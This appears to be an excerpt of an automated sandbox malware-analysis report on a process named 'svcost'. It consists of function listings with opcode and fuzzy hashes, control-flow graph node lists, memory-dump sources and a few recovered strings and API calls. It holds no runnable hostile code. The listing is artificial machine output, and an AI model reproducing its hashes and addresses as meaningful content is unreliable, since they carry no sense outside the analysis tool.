                                                                                            • API String ID: 0-1917797414
                                                                                            • Opcode ID: 08a6a7383a57d3df825be2eab8959a4248fc0993a49712d2cf66d18f1cbe3290
                                                                                            • Instruction ID: 8e3a95dbd76772f1aad1dce9b23b1c44fc27f357b46701174408984fd304077a
                                                                                            • Opcode Fuzzy Hash: 08a6a7383a57d3df825be2eab8959a4248fc0993a49712d2cf66d18f1cbe3290
                                                                                            • Instruction Fuzzy Hash: 14221874A00218DFDB14CFA4C894BADB7B6FF48704F1595AAE509AB3A5DB70AC81CF50
                                                                                            Function 02116992 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2175 2116992-211699e 2176 2117734-2117764 2175->2176 2177 21169a4-21169c9 2175->2177 2186 211776a-211778f call 2115708 2176->2186 2187 21183ae-2118412 call 2115418 call 2112ed8 call 21154b0 2176->2187 2180 2116937-211693f 2177->2180 2181 21169cf-21169d7 2177->2181 2183 2116941-2116f4f 2180->2183 2184 2116948-21174e4 2180->2184 2181->2180 2201 2117f71-2117f75 2183->2201 2202 2116f55-2116f7a call 2115708 2183->2202 2188 21174ea-21174f2 2184->2188 2189 21175dc-21175ec 2184->2189 2186->2180 2195 2117795-211779d 2186->2195 2212 2118967-2118996 call 2115418 call 5415c30 2187->2212 2213 2118418-2118420 2187->2213 2188->2180 2188->2189 2189->2180 2195->2180 2203 2117f7b-2117f83 2201->2203 2204 2117c6d-2117c74 2201->2204 2202->2180 2211 2116f80-2116f88 2202->2211 2203->2180 2209 2118781-2118793 call 541a3d0 2204->2209 2210 2117c7a-2117c9f call 2115708 2204->2210 2215 2118798-21187ab 2209->2215 2210->2180 2218 2117ca5-2117cad 2210->2218 2211->2180 2220 211899b-21189c8 call 2115708 2212->2220 2213->2180 2218->2180 2218->2201 2220->2180 2224 21189ce-21189d6 2220->2224 2224->2180
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ^$^$cV
                                                                                            • API String ID: 0-549033992
                                                                                            • Opcode ID: d40fbafdd0d8a88012ee8410dae744c44d25c36245b1efb171edbaa11b076958
                                                                                            • Instruction ID: 7f90efe7f26bfc18bff28d8cbb40bed04578878293e1d9d1f024dbfa15f2bdd0
                                                                                            • Opcode Fuzzy Hash: d40fbafdd0d8a88012ee8410dae744c44d25c36245b1efb171edbaa11b076958
                                                                                            • Instruction Fuzzy Hash: 1741D07494126CCFDB24EFA0C888BEDBBB2BB49301F5051AAC409BB394DB755A85CF54
                                                                                            Function 05400347 Relevance: 3.8, Strings: 3, Instructions: 83COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2227 5400347-5400363 2229 540a369-540a433 call 211b938 2227->2229 2230 5400369-5400391 2227->2230 2255 540a439-540a446 2229->2255 2233 5400106-5400111 2230->2233 2234 5400397-54003a2 2230->2234 2235 5400113-5404517 2233->2235 2236 540011a-5414010 2233->2236 2234->2233 2235->2233 2253 540451d-5404528 2235->2253 2236->2233 2253->2233 2256 540a44c-540a457 2255->2256 2257 540937e-5409399 2255->2257 2258 54093ab-54093bf 2257->2258 2259 540939b-54093a1 2257->2259 2258->2229 2259->2258
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: <`C$T$cV
                                                                                            • API String ID: 0-2808027785
                                                                                            • Opcode ID: 21d237c85b146a83656b9cf2fe726568474a316283c37f19a4419ec3d471bf03
                                                                                            • Instruction ID: d4868f75d46ea8f03019d3a586a99ff29e59c753bc3779176769994f425c6872
                                                                                            • Opcode Fuzzy Hash: 21d237c85b146a83656b9cf2fe726568474a316283c37f19a4419ec3d471bf03
                                                                                            • Instruction Fuzzy Hash: 4E411574A08229CFCB64DF58C998AEABBF1FF49301F5040EAE549AB391D7745E808F05
                                                                                            Function 0069A43C Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2261 69a43c-69a460 2276 69a466 call 69ba40 2261->2276 2277 69a466 call 69ba50 2261->2277 2263 69a46c-69a4a9 2264 69a4af-69a4ba 2263->2264 2265 69a1f2-69a1fb 2263->2265 2264->2265 2266 69a1fd 2265->2266 2267 69a204-69b2d4 2265->2267 2269 69a191-69a1da 2266->2269 2270 69a187-69a18e 2266->2270 2267->2265 2273 69b2da-69b2e5 2267->2273 2269->2265 2275 69a1dc-69a1e7 2269->2275 2273->2265 2275->2265 2276->2263 2277->2263
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$/$cV
                                                                                            • API String ID: 0-3499279629
                                                                                            • Opcode ID: 2e2d241dc0bcbfe32ca3c851a5c3e36d2097071d0b8b9152c42e42cc0231aae1
                                                                                            • Instruction ID: a4348cbc090c3601c2307f22b8e1d2a94dcf51a1985da6405ceb18dd21265e1e
                                                                                            • Opcode Fuzzy Hash: 2e2d241dc0bcbfe32ca3c851a5c3e36d2097071d0b8b9152c42e42cc0231aae1
                                                                                            • Instruction Fuzzy Hash: 2E21E2349002AADBCF21DF98C844BDDB7B6FB59314F0085AAE909B7650C7316E85CF80
                                                                                            Function 023A261E Relevance: 3.8, Strings: 3, Instructions: 51COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2278 23a261e-23a2623 call 23a3aa5 2281 23a2629-23a2634 2278->2281 2282 23a433e-23a4354 2278->2282 2283 23a014a-23a0155 2281->2283 2287 23a435c-23a4405 2282->2287 2285 23a015e-23a0e70 2283->2285 2286 23a0157-23a024c 2283->2286 2289 23a0e72 2285->2289 2290 23a0e77-23a0e85 2285->2290 2286->2283 2294 23a0252-23a025d 2286->2294 2287->2283 2300 23a440b-23a4416 2287->2300 2289->2290 2290->2283 2294->2283 2300->2283
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0C$"$(
                                                                                            • API String ID: 0-2570854509
                                                                                            • Opcode ID: f14a3c411884c43965e8418505d0dab072afd223ea025b4cf3853cc7bdab2082
                                                                                            • Instruction ID: 408cc3a9fe2a376128c6be079ffd19cc01ac8686a6c387ec1be52f4ecee55f93
                                                                                            • Opcode Fuzzy Hash: f14a3c411884c43965e8418505d0dab072afd223ea025b4cf3853cc7bdab2082
                                                                                            • Instruction Fuzzy Hash: 53219FB4A012288FDB64DF28D968BDAB7F1FB4A301F4051EAD50AA7260DB355E81CF45
                                                                                            Function 02112F18 Relevance: 3.8, Strings: 3, Instructions: 25COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2301 2112f18-2112f38 2302 2112f3a 2301->2302 2303 2112f3f-2112f44 2301->2303 2302->2303 2305 2112f4e-2112f56 call 2fcad8 2303->2305 2306 2112f5b-2112f5f 2305->2306
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: _$_$C
                                                                                            • API String ID: 0-505629384
                                                                                            • Opcode ID: 0cafc63b546c5990e224b051b7a90a72d704b60002798503f5f66e2ef194a87b
                                                                                            • Instruction ID: 01a3c68a73837ebecb30a1860a5d7a769db1bc2d585447e8c6639b62b9f372ee
                                                                                            • Opcode Fuzzy Hash: 0cafc63b546c5990e224b051b7a90a72d704b60002798503f5f66e2ef194a87b
                                                                                            • Instruction Fuzzy Hash: A7E0D87184624C9FD701DBB49920BAF7BA4DB06305F1001FACC45D7263DB350A188F92
                                                                                            Function 002FFAC8 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$d
                                                                                            • API String ID: 0-1322973597
                                                                                            • Opcode ID: 0f05660029655b34202dbc1c63f64a1c200665ee12f12762bd8888fdf121a0be
                                                                                            • Instruction ID: 1bdccb231085b2081562b6960f3d836546b6e6acb0b1fcec339b5447bc2f4922
                                                                                            • Opcode Fuzzy Hash: 0f05660029655b34202dbc1c63f64a1c200665ee12f12762bd8888fdf121a0be
                                                                                            • Instruction Fuzzy Hash: E1D1673520060A8FCB24CF29C584A6AB7F2FF89350B15C979D55A9B361DB30FC52CB94
                                                                                            Function 0211FA2B Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: |*6$cV
                                                                                            • API String ID: 0-2602844131
                                                                                            • Opcode ID: 1c1a7f4ea0ec7646fb05ac1416984dd4e532f6029d3340f177216cf1ae8391d3
                                                                                            • Instruction ID: 8e6f25b13d9357ea27b6e441702b3780bdd9dcf1fd1a61ff97def0a992f395b8
                                                                                            • Opcode Fuzzy Hash: 1c1a7f4ea0ec7646fb05ac1416984dd4e532f6029d3340f177216cf1ae8391d3
                                                                                            • Instruction Fuzzy Hash: 3DB13B74E04318CFDB64DFA4D854BADBBF2FB49310F5080AAE419AB695CB345986CF05
                                                                                            Function 023AD940 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$H!p
                                                                                            • API String ID: 0-1960402415
                                                                                            • Opcode ID: b260df3bf43351d10a426676ec823f73b3d6a62024561d722eff2e9d39590640
                                                                                            • Instruction ID: 552df762e8dbf40f10d0a89338a777493147ade8259ea216fb4751477612a3f5
                                                                                            • Opcode Fuzzy Hash: b260df3bf43351d10a426676ec823f73b3d6a62024561d722eff2e9d39590640
                                                                                            • Instruction Fuzzy Hash: 3B51BD313002048FDB28AB74C86462E77A3EF99315B64857DE506DB7A5CF35EC06CBA5
                                                                                            Function 02112BF8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p$cV
                                                                                            • API String ID: 0-1023711961
                                                                                            • Opcode ID: 2b2f28b457a48dcb13833037fef361130c943c5a859088c8cce0131a2baf6876
                                                                                            • Instruction ID: 451325ba8f9c26a3f3a8f99c5c66f32249d5ef1fe1f1b7e5f97d44d0284dfb8f
                                                                                            • Opcode Fuzzy Hash: 2b2f28b457a48dcb13833037fef361130c943c5a859088c8cce0131a2baf6876
                                                                                            • Instruction Fuzzy Hash: FA710674E04208DFDB04EFA8D99469EBBF2FB99300F20802AE515BB399DB745A45CF54
                                                                                            Function 02112C08 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p$cV
                                                                                            • API String ID: 0-1023711961
                                                                                            • Opcode ID: 5c3e8fc0996849a30ea88e47d442a2d26ea78a70db173e98b4dc018f0c50b6e4
                                                                                            • Instruction ID: 93352b8cf0c83506e00dd4c819027a7d218a63e35feb1f13ce7bb0289ab133f3
                                                                                            • Opcode Fuzzy Hash: 5c3e8fc0996849a30ea88e47d442a2d26ea78a70db173e98b4dc018f0c50b6e4
                                                                                            • Instruction Fuzzy Hash: 0571E674E04208DFDB04EFA8D95469EBBF2FB99300F208029E515BB398DB745A45CF55
                                                                                            Function 023A433B Relevance: 2.5, Strings: 2, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0C$"
                                                                                            • API String ID: 0-2711401315
                                                                                            • Opcode ID: 3b4a4a284dc57a1922a17c766f426404ef8a4baf0f9cebe15d349e0c01394b73
                                                                                            • Instruction ID: c286fee88cfd5fbb49bd0d771869e5eabddfd0ff7b47eb3b7fe6e289bd74f8a9
                                                                                            • Opcode Fuzzy Hash: 3b4a4a284dc57a1922a17c766f426404ef8a4baf0f9cebe15d349e0c01394b73
                                                                                            • Instruction Fuzzy Hash: F5217FB4A012288FDB64DF24D958BDABBF1BB4A301F4041EAD50EA7260DB355E81CF41
                                                                                            Function 05400445 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5$cV
                                                                                            • API String ID: 0-365018511
                                                                                            • Opcode ID: 7de348da230fd7a2f5e3367360da93ce802b31b284e047ed2da645ea122917ba
                                                                                            • Instruction ID: 3783543df50ec6952314fc2d9e483b29be74701a223145a470590a5693e7a082
                                                                                            • Opcode Fuzzy Hash: 7de348da230fd7a2f5e3367360da93ce802b31b284e047ed2da645ea122917ba
                                                                                            • Instruction Fuzzy Hash: 9711E578A052288FCB24EF18D944A89B7F1FB8A300F1080E6A84DB7794DB345F81CF51
                                                                                            Function 02113369 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: _$_
                                                                                            • API String ID: 0-2459770204
                                                                                            • Opcode ID: 431069655bc3631af09133cda02f0e60cf46da2337e6f71ab2ef58f38b57d0e6
                                                                                            • Instruction ID: c5d52fc105d6e5865dd967f94199271fe8e817a9260482be0fdec7cc6e92f4b4
                                                                                            • Opcode Fuzzy Hash: 431069655bc3631af09133cda02f0e60cf46da2337e6f71ab2ef58f38b57d0e6
                                                                                            • Instruction Fuzzy Hash: 90F0F874D45248DFCB54CBA8D5656AEBFB0EB89304F1082EACC2993352E7395A06DF41
                                                                                            Function 05400EA3 Relevance: 2.5, Strings: 2, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$cV
                                                                                            • API String ID: 0-606709522
                                                                                            • Opcode ID: 36ec3d9c8cda43a6fb2a5bf4d4a0f4c4505b188f20cced07b95fcb226a9ada96
                                                                                            • Instruction ID: 3a42e53d9df4e1563bf5633b2adcb6924a4fe21111a653f7a2954c0be2d4a0d3
                                                                                            • Opcode Fuzzy Hash: 36ec3d9c8cda43a6fb2a5bf4d4a0f4c4505b188f20cced07b95fcb226a9ada96
                                                                                            • Instruction Fuzzy Hash: 76F030746081148FD755EF68C858A8AB7F2EB8A304F1041E6A51DA7394CB359F85CF10
                                                                                            Function 044BDD40 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 044BDDE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520042191.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_44b0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: b4998425198b8bc13c4ca76cc5177ee55ed60bf88c76728cce26658ba7e14f60
                                                                                            • Instruction ID: df0198f0d753973d6cfef0cd7300339070cd89000365a147c41a92138953e77a
                                                                                            • Opcode Fuzzy Hash: b4998425198b8bc13c4ca76cc5177ee55ed60bf88c76728cce26658ba7e14f60
                                                                                            • Instruction Fuzzy Hash: 3D3198B4D012489FDF14CFA9D984ADEFBB5BB49310F24942AE814B7210D735A945CFA4
                                                                                            Function 0212F708 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515813150.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2120000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 301a08d11d6af34dfc9867a434ee16ec5181640b2134261d19f4bfc3825a6439
                                                                                            • Instruction ID: f34595cd7f8e82cd872dc526a00aa2f9dad8992ef90d7b755be54a21ef8643d0
                                                                                            • Opcode Fuzzy Hash: 301a08d11d6af34dfc9867a434ee16ec5181640b2134261d19f4bfc3825a6439
                                                                                            • Instruction Fuzzy Hash: 7531CBB4D012189FDB10CFA9D984AEEFBF5AB49310F24942AE814B7210D735A945CF54
                                                                                            Function 0212F710 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515813150.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2120000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: a6ac38ae384e396bb22f77d3df8e434282b016baf3c2af477466e86aa0b6fb7c
                                                                                            • Instruction ID: 890e2ddfa5174f0ce2401f846ad62ab23d776b84f0aaa62ed77b0d68273d0598
                                                                                            • Opcode Fuzzy Hash: a6ac38ae384e396bb22f77d3df8e434282b016baf3c2af477466e86aa0b6fb7c
                                                                                            • Instruction Fuzzy Hash: 7A31DBB4D012189FDF10CFA9D984AEEFBF5AF49310F24942AE814B7210D739A945CFA4
                                                                                            Function 023AF968 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: df5ff97722332f129d538ed98bcd2f0c5ab607935bb050ab9bde2d5275b81304
                                                                                            • Instruction ID: c42b2f3cf3f7152ae49fd55ce043c50dd574bed149e83c6f11526f5daea5ae76
                                                                                            • Opcode Fuzzy Hash: df5ff97722332f129d538ed98bcd2f0c5ab607935bb050ab9bde2d5275b81304
                                                                                            • Instruction Fuzzy Hash: BCC12870B002148FDB04DF69C8A4AAEBBF6FF89711F1180A9E505DB3A5DB71AD41CB91
                                                                                            Function 00697D70 Relevance: 1.6, Strings: 1, Instructions: 317COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 676036db7df556255550bc9acfce657f579bbe8979aff522d8627eb52472275e
                                                                                            • Instruction ID: c8714856bc5ee336f4829ccf2a6e32a86cb63d79c0b1fffab4660b9ad8ad6996
                                                                                            • Opcode Fuzzy Hash: 676036db7df556255550bc9acfce657f579bbe8979aff522d8627eb52472275e
                                                                                            • Instruction Fuzzy Hash: 41E1D374A15218CFDB54EF65D984BADBBB6FF8A300F1080AAE419A7794DB305D89CF10
                                                                                            Function 00697D62 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: a4bcae9df6f44ed463dcdd8b2fc220c71f0859980255639e4b28656c57364d34
                                                                                            • Instruction ID: d582da3792f3d32c761a2fda7826ecd237fdeff0930567f2e9a026a5df830bfb
                                                                                            • Opcode Fuzzy Hash: a4bcae9df6f44ed463dcdd8b2fc220c71f0859980255639e4b28656c57364d34
                                                                                            • Instruction Fuzzy Hash: 6FE1E474A15218CFDB54EFA5D984BADBBB6FF8A300F1080AAE419A7794DB305D85CF00
                                                                                            Function 00697E98 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 5c9167397cedc5e97c03a5b814b518923c0ecb5f53039da1a377f3a2cc0824d3
                                                                                            • Instruction ID: add3a7ae15d3b30c507ece2476f18366461b8d18415f9b0789650b49e125a059
                                                                                            • Opcode Fuzzy Hash: 5c9167397cedc5e97c03a5b814b518923c0ecb5f53039da1a377f3a2cc0824d3
                                                                                            • Instruction Fuzzy Hash: 00D1C274A15218CFDB54EFA4D984BADB7B6FF8A300F1080AAE419AB794DB305D85CF14
                                                                                            Function 00614288 Relevance: 1.5, APIs: 1, Instructions: 33libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 006142BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515571016.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_610000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2ce14035dde7691fa5790b8c82a9f9950637fd260c5d71c96c18d7dd90b56346
                                                                                            • Instruction ID: 310d83d43e39999233d1c064d6c41521bffdff502dd1e5fc5e9c163cfc463ebb
                                                                                            • Opcode Fuzzy Hash: 2ce14035dde7691fa5790b8c82a9f9950637fd260c5d71c96c18d7dd90b56346
                                                                                            • Instruction Fuzzy Hash: 43F03A6065A384AFE31287664C2DB9A3F689F43744F2840DAA0449A6E3C6785885C772
                                                                                            Function 00697F59 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: c419cc637c6875184e706c4bed67ae91927e354e8cd700dafaf5bf87d2c9d2b1
                                                                                            • Instruction ID: 58d3a043eef59a56fae4a3e492799ac32c78afff08806848b42892e903b5b4af
                                                                                            • Opcode Fuzzy Hash: c419cc637c6875184e706c4bed67ae91927e354e8cd700dafaf5bf87d2c9d2b1
                                                                                            • Instruction Fuzzy Hash: 62D1E274A05218CFDB54EF64D984BADB7B6FF9A300F1080AAE409AB795DB305D85CF04
                                                                                            Function 006988DD Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: ec675f790f3e37f776a10fa207ce2e26ef039d35f788238fb372cb735a34a444
                                                                                            • Instruction ID: 6f55b7aa61b01cc48954853450ea8cf9ad29c489c831673399b9d9bedfcaef43
                                                                                            • Opcode Fuzzy Hash: ec675f790f3e37f776a10fa207ce2e26ef039d35f788238fb372cb735a34a444
                                                                                            • Instruction Fuzzy Hash: 00B10574E06218CFDB54DF68D980BADB7F6BB8A300F6091AAD009A7795DB345D86CF10
                                                                                            Function 002F8780 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 5cd9a57966756b217c8d6d6e68c19ccfb84fec12f3e72c1baa6c6007a43cdb9d
                                                                                            • Instruction ID: 4db5dadfaebb68788518d8f67469396343de4ba92c951009194ea5396f755998
                                                                                            • Opcode Fuzzy Hash: 5cd9a57966756b217c8d6d6e68c19ccfb84fec12f3e72c1baa6c6007a43cdb9d
